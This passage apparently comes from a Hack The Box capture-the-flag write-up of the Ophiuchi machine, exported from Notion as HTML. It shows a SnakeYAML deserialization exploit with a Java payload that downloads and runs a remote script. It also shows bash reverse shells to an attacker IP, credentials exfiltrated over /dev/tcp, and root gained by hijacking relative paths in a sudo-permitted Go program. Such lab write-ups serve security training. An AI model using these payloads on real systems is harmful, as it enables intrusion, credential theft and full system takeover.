<span class="token function">bash</span> <span class="token parameter variable">-i</span> <span class="token operator">>&</span> /dev/tcp/10.10.14.103/4444 <span class="token operator"><span class="token file-descriptor important">0</span>></span><span class="token file-descriptor important">&1</span></span></span></span></code></pre></li><li id="https://www.notion.so/28c420edb7e9476d8248a948d3088885" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">AwesomeScriptEngineFactory.java</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/ac3503555c3d40cabc2107f2faf7dd14" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token keyword">public</span> <span class="token class-name">AwesomeScriptEngineFactory</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"curl http://10.10.14.103:8000/rev.sh -o /dev/shm/rev.sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"chmod +x /dev/shm/rev.sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"bash /dev/shm/rev.sh"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">IOException</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span></span></span></span></code></pre></li><li id="https://www.notion.so/a3815ca0f9304eafa99356076c8975be" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Compile the Java payload, and place the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.jar</code></span><span class="SemanticString"> file in our HTTP server:</span></span><div id="https://www.notion.so/c58198b1a67a48329ade6e2d7322d9e2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ javac ./yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java</code></span></span></p></div><div id="https://www.notion.so/3737c28d468d4395abbe5b0816b558c5" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ jar -cvf yaml-payload.jar -C ./yaml-payload/src/ .</code></span></span></p></div><div id="https://www.notion.so/2752795fee984edc8936b84b430d363a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ mv yaml-payload.jar ./www</code></span></span></p></div></li><li id="https://www.notion.so/7602659137524fc0becf3e5643ba93cc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for reverse shell on port 4444:</span></span><div id="https://www.notion.so/c61207e52a4d4ade9cd355999b3ea0ca" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4444</code></span></span></p></div></li><li id="https://www.notion.so/6371b153c1474440baf764ae1b63c5ef" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Make SnakeYAML perform a GET request on our .jar payload:</span></span><pre id="https://www.notion.so/b2ab52548a3d4ffd8a888569f167e0ce" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token tag">!!javax.script.ScriptEngineManager</span> <span class="token punctuation">[</span>
<span class="token tag">!!java.net.URLClassLoader</span> <span class="token punctuation">[</span><span class="token punctuation">[</span>
<span class="token tag">!!java.net.URL</span> <span class="token punctuation">[</span><span class="token string">"http://10.10.14.103:8000/yaml-payload.jar"</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span><span class="token punctuation">]</span>
<span class="token punctuation">]</span></span></span></span></code></pre></li><li id="https://www.notion.so/11d4131fc0df4394bdbdf0b52e872322" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Getting Java errors:</span></span><pre id="https://www.notion.so/dbeb14508919448c861d6b4d8710e70a" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token key atrule">java.lang.UnsupportedClassVersionError</span><span class="token punctuation">:</span> artsploit/AwesomeScriptEngineFactory has been compiled by a more recent version of the Java Runtime (class file version 58.0)<span class="token punctuation">,</span> this version of the Java Runtime only recognizes class file versions up to 55.0</span></span></span></code></pre></li><li id="https://www.notion.so/67ae47d6690044198459d33aa271a33f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looks like </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">javac</code></span><span class="SemanticString"> compiled the file with a format too recent (Java 14 - 58.0), let's specify the version (Java 11 - 55.0) and recompile:</span></span><div id="https://www.notion.so/2fa5e177263b4d4192a9dead9884a2c2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ javac ./yaml-payload/src/artsploit/AwesomeScriptEngineFactory.java --source 11 --target 1</code></span></span></p></div><div id="https://www.notion.so/8c546d2768524fdbbbcdbdbf893b5a40" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ jar -cvf yaml-payload.jar -C ./yaml-payload/src/ . && mv yaml-payload.jar ./www</code></span></span></p></div></li><li id="https://www.notion.so/e9835130c84f4fdc8c9fa6b62b07ec98" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Resend payload, and we should get a reverse shell as tomcat:</span></span><div id="https://www.notion.so/18d40226c0c44603900cc779aa3d5681" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/5ebb65e35f104819b8afd40acc21f388" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>tomcat
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)</span></span></span></code></pre></li><li id="https://www.notion.so/2d2d803fe4dd43e894d25ea51d1585dc" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's go look for the credential file for the manager application, set up a listener locally and transfer the file through </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">nc</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/b0495abd2d954e9fa377eecd0249fdec" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 1337 > tomcat-users.xml</code></span></span></p></div><div id="https://www.notion.so/1170196583084587973854399e70aea8" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat /opt/tomcat/conf/tomcat-users.xml > /dev/tcp/10.10.14.103/1337</code></span></span></p></div></li><li id="https://www.notion.so/45bf00a696924da09c0c54fb51d25753" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">tomcat-users.xml</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/265b2eb45689408d8fdef87bdc996d24" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>user</span> <span class="token attr-name">username</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>admin<span class="token punctuation">"</span></span> <span class="token attr-name">password</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>whythereisalimit<span class="token punctuation">"</span></span> <span class="token attr-name">roles</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">"</span>manager-gui,admin-gui<span class="token punctuation">"</span></span><span class="token punctuation">/></span></span></span></span></span></code></pre></li><li id="https://www.notion.so/c7bb82a461e34a70ae457381e080fa04" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found manager credentials:</span></span><div id="https://www.notion.so/5cb4c99412d040f2b178339eb7b74f87" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">admin:whythereisalimit</code></span></span></p></div></li><li id="https://www.notion.so/71a798059ab04a5182460237a23f10b0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Navigating to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/home</code></span><span class="SemanticString"> directory, we find an "admin" user:</span></span></li><li id="https://www.notion.so/110c10a3de3b473d8fa4232ad4c80dd1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Attempt to switch user to "admin":</span></span><div id="https://www.notion.so/f6fa31fdd0434b5c8a6cc0729ea8227d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su admin</code></span></span></p></div><div id="https://www.notion.so/fbaaf0363d9d4f689610cf7a2bf3dac2" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Password: whythereisalimit</code></span></span></p></div></li><li id="https://www.notion.so/399c8754b28d43c6b8a30d07131bf4cf" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The terminal seems to be hanging up at </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">su</code></span><span class="SemanticString">, so let's upgrade our shell by spawning a pty:</span></span><div id="https://www.notion.so/33b40c9a4e934535a7202022602c8ba4" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "import pty; pty.spawn('/bin/bash')" > /dev/shm/shell.py</code></span></span></p></div><div id="https://www.notion.so/cf24d0ac69464dbcb719c5d137434f07" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ python3 /dev/shm/shell.py</code></span></span></p></div></li><li id="https://www.notion.so/4ce98514703d4eedaa70c19e6cbf00a3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Retry, and we should get a shell as "admin":</span></span><div id="https://www.notion.so/a7f0c72ab11643a3a209bd87335c4210" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/e15f31ebde26411b8fdfb67c05963e17" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>admin
uid=1000(admin) gid=1000(admin) groups=1000(admin)</span></span></span></code></pre></li><li id="https://www.notion.so/1a8fc3c949fc4b93ac214971aae27bd8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Alternatively, it is also possible to simply SSH into the victim as "admin", this gives us a stable interactive shell with tab-completion etc.</span></span></li><li id="https://www.notion.so/330c0cf1847844d3967ca9db4baf9b76" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get user flag!</span></span></li></ul><h2 id="https://www.notion.so/23ba62d0116a4014b0cf211df605c0fb" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/23ba62d0116a4014b0cf211df605c0fb"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Privilege Escalation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/643c2141e0f6434b91225445f0832267" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using the credentials, login to </span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="http://ophiuchi.htb:8080/manager">http://ophiuchi.htb:8080/manager</a></span><span class="SemanticString">, and we arrive at an application manager panel:</span></span><div id="https://www.notion.so/a70350d98f4b4f5db81b7492f1268124" class="Image Image--Normal"><figure><a href="https://i.imgur.com/EzTrnUy.png?width=1008"><img src="https://i.imgur.com/EzTrnUy.png?width=1008" style="width:1008px"/></a><figcaption><span class="SemanticStringArray"></span></figcaption></figure></div></li><li id="https://www.notion.so/396c71fa09cd4d369d70a3350a2c30a1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Looking through the different applications, it seems we can upload WAR files to be deployed, but it doesn't seem helpful for escalating privileges because we already have code execution as tomcat.</span></span></li><li id="https://www.notion.so/57f110f72f1e45cfb196de7a7db13717" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Checking sudo privileges on admin user:</span></span><div id="https://www.notion.so/9e22e632fe0748b19cf82040909ba80c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo -l</code></span></span></p></div><pre id="https://www.notion.so/8eb6035cc64d4aadb6142ce361afeb77" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go</span></span></span></code></pre></li><li id="https://www.notion.so/678fff1270fe49afa3e432b82ec48e73" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">It seems like the admin can run </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/usr/bin/go</code></span><span class="SemanticString"> as root on a specific </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString"> file in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/opt/wasm-functions</code></span><span class="SemanticString">, let's download the entire directory to have a better look:</span></span><div id="https://www.notion.so/eb9e48c191fd46e9b5e859cee88b7f0b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ scp -r [email protected]:/opt/wasm-functions .</code></span></span></p></div><pre id="https://www.notion.so/cde695f489304cd0b79a0d2919cac447" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>index 100% 2458KB 4.9MB/s 00:00
index.go 100% 522 19.3KB/s 00:00
deploy.sh 100% 88 3.3KB/s 00:00
main.wasm 100% 1445KB 5.6MB/s 00:00
index.go 100% 522 18.7KB/s 00:00
deploy.sh 100% 88 3.2KB/s 00:00
main.wasm 100% 1445KB 5.6MB/s 00:00</span></span></span></code></pre></li><li id="https://www.notion.so/ce8578408184430a838752d54f311d7b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/c7de8aa218364628bd8ab9f2f6064733" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>package main
import (
"fmt"
wasm "github.com/wasmerio/wasmer-go/wasmer"
"os/exec"
"log"
)
func main() {
bytes, _ := wasm.ReadBytes("main.wasm")
instance, _ := wasm.NewInstance(bytes)
defer instance.Close()
init := instance.Exports["info"]
result,_ := init()
f := result.String()
if (f != "1") {
fmt.Println("Not ready to deploy")
} else {
fmt.Println("Ready to deploy")
out, err := exec.Command("/bin/sh", "deploy.sh").Output()
if err != nil {
log.Fatal(err)
}
fmt.Println(string(out))
}
}</span></span></span></code></pre></li><li id="https://www.notion.so/6bd121a7501a42d996726fa14d6fe50d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We also see a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">deploy.sh</code></span><span class="SemanticString"> script in the same directory, but it seems to be empty with comments:</span></span><pre id="https://www.notion.so/deac800b3a9f4744a43659d88a7d3b21" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token shebang important">#!/bin/bash</span>
<span class="token comment"># ToDo</span>
<span class="token comment"># Create script to automatic deploy our new web at tomcat port 8080</span></span></span></span></code></pre></li><li id="https://www.notion.so/2483ddc3228e48c493cfa4890a2e8922" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">There is also a WebAssembly binary called </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/53d6d4c9f3be453b859c6b02bdc8d191" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ file main.wasm</code></span></span></p></div><pre id="https://www.notion.so/12600aea7251452ba5c23eddce535b95" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>main.wasm: WebAssembly (wasm) binary module version 0x1 (MVP)</span></span></span></code></pre></li><li id="https://www.notion.so/1b7c70173d684b35b3dd54424281e43b" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Executing </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString"> with sudo returns:</span></span><div id="https://www.notion.so/cb65030554824f4a8a2a6e7a2abdb565" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo /usr/bin/go run /opt/wasm-functions/index.go</code></span></span></p></div><pre id="https://www.notion.so/f3d2ab1bee7541cf87ecbadd50f07ef3" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Not ready to deploy</span></span></span></code></pre></li><li id="https://www.notion.so/59f1e47c7e1f4b098a31a6f0591f4fe7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">index.go</code></span><span class="SemanticString"> script is also calling files </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> and </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">deploy.sh</code></span><span class="SemanticString"> without using absolute paths, this means the files in the current working directory when we run the sudo command will be called instead.</span></span></li><li id="https://www.notion.so/4067467a420d49d3bd1777b9ec927ec1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The script executes </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">deploy.sh</code></span><span class="SemanticString"> with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/sh</code></span><span class="SemanticString"> if the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">info</code></span><span class="SemanticString"> function in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> returns a value other than </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">1</code></span><span class="SemanticString">, which is our goal.</span></span></li><li id="https://www.notion.so/3fee7b93d6e54009aaeaf8c0dfb61608" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Otherwise, it prints "Not ready to deploy", and exits.</span></span></li><li id="https://www.notion.so/f33919c84a29496e9d3745cb7dfb4276" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's begin by creating a deploy.sh file in our temporary working directory:</span></span><div id="https://www.notion.so/e692cad4357945efb48f6ec6a7b91103" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.103/4444 0>&1'" > /dev/shm/deploy.sh</code></span></span></p></div></li><li id="https://www.notion.so/61c2da309c2443ee91a1f1bfdf24f9fe" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Since this script will be executed by </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/sh</code></span><span class="SemanticString"> and not </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/bash</code></span><span class="SemanticString">, we have to additionally add a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/bin/bash -c</code></span><span class="SemanticString"> flag in front of the payload to get proper redirection.</span></span></li><li id="https://www.notion.so/61832a789ed74b15a44b81cdc2fc5a66" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wasm2wat</code></span><span class="SemanticString">, decompile the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> binary into a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.wat</code></span><span class="SemanticString"> file:</span></span><div id="https://www.notion.so/d45c860744de49618054866c3ca4f28c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wasm2wat main.wasm > main.wat</code></span></span></p></div></li><li id="https://www.notion.so/bc7440ea2e3644bbb88378c32b950fc2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wat</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/148b71bb49284b98823cb927f019aab8" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token punctuation">(</span><span class="token keyword">module</span>
<span class="token punctuation">(</span><span class="token keyword">type</span> <span class="token variable">$t0</span> <span class="token punctuation">(</span><span class="token keyword">func</span> <span class="token punctuation">(</span><span class="token keyword">result</span> <span class="token keyword">i32</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">func</span> <span class="token variable">$info</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"info"</span><span class="token punctuation">)</span> <span class="token punctuation">(</span><span class="token keyword">type</span> <span class="token variable">$t0</span><span class="token punctuation">)</span> <span class="token punctuation">(</span><span class="token keyword">result</span> <span class="token keyword">i32</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">table</span> <span class="token variable">$T0</span> <span class="token number">1</span> <span class="token number">1</span> funcref<span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">memory</span> $<span class="token keyword">memory</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"memory"</span><span class="token punctuation">)</span> <span class="token number">16</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">global</span> <span class="token variable">$g0</span> <span class="token punctuation">(</span><span class="token keyword">mut</span> <span class="token keyword">i32</span><span class="token punctuation">)</span> <span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">1048576</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">global</span> <span class="token variable">$__data_end</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"__data_end"</span><span class="token punctuation">)</span> <span class="token keyword">i32</span> <span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">1048576</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">(</span><span class="token keyword">global</span> <span class="token variable">$__heap_base</span> <span class="token punctuation">(</span><span class="token keyword">export</span> <span class="token string">"__heap_base"</span><span class="token punctuation">)</span> <span class="token keyword">i32</span> <span class="token punctuation">(</span><span class="token keyword">i32<span class="token punctuation">.</span>const</span> <span class="token number">1048576</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span></span></span></span></code></pre></li><li id="https://www.notion.so/6daacf5287354f2fad40c9305d8c9db0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Change the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">i32</code></span><span class="SemanticString"> line under function </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$info</code></span><span class="SemanticString"> from a 0 to a 1:</span></span><div id="https://www.notion.so/6020c6acb17440f9b95416ceed842f09" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">(i32.const 0))</code></span><span class="SemanticString"> → </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">(i32.const 1))</code></span></span></p></div></li><li id="https://www.notion.so/caabbbf9320c4aa989c8c34ef0f58627" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">wat2wasm</code></span><span class="SemanticString">, recompile the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> binary:</span></span><div id="https://www.notion.so/6411015201ca4bcf894cab426bd8c6c7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wat2wasm main.wat && mv main.wasm ./www</code></span></span></p></div></li><li id="https://www.notion.so/8c4f0120a7634300a79be4fca7c8ef11" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Download the edited </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">main.wasm</code></span><span class="SemanticString"> to our temporary directory:</span></span><div id="https://www.notion.so/d1e10ab9f3764d1fbf1cdea190277097" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ wget http://10.10.14.103:8000/main.wasm</code></span></span></p></div></li><li id="https://www.notion.so/04059aa5e4434f0294163179855ecb6f" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Listen for a reverse shell on port 4444:</span></span><div id="https://www.notion.so/65c942e9bd6241a7ae125cee92330151" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ nc -lvnp 4444</code></span></span></p></div></li><li id="https://www.notion.so/2de05e08e75e4c3798db1391786913f0" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">While in our temporary directory, run as sudo:</span></span><div id="https://www.notion.so/394a911e4b02436a8e1ebe1b67138754" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo /usr/bin/go run /opt/wasm-functions/index.go</code></span></span></p></div></li><li id="https://www.notion.so/c7bdaba01a604a2db4d9a06e336850d2" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We should then get a shell as root:</span></span><div id="https://www.notion.so/2439a472f70947fda9927571b763ae75" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ whoami && id</code></span></span></p></div><pre id="https://www.notion.so/98d0821641fe4a769c0ca094e46140ec" 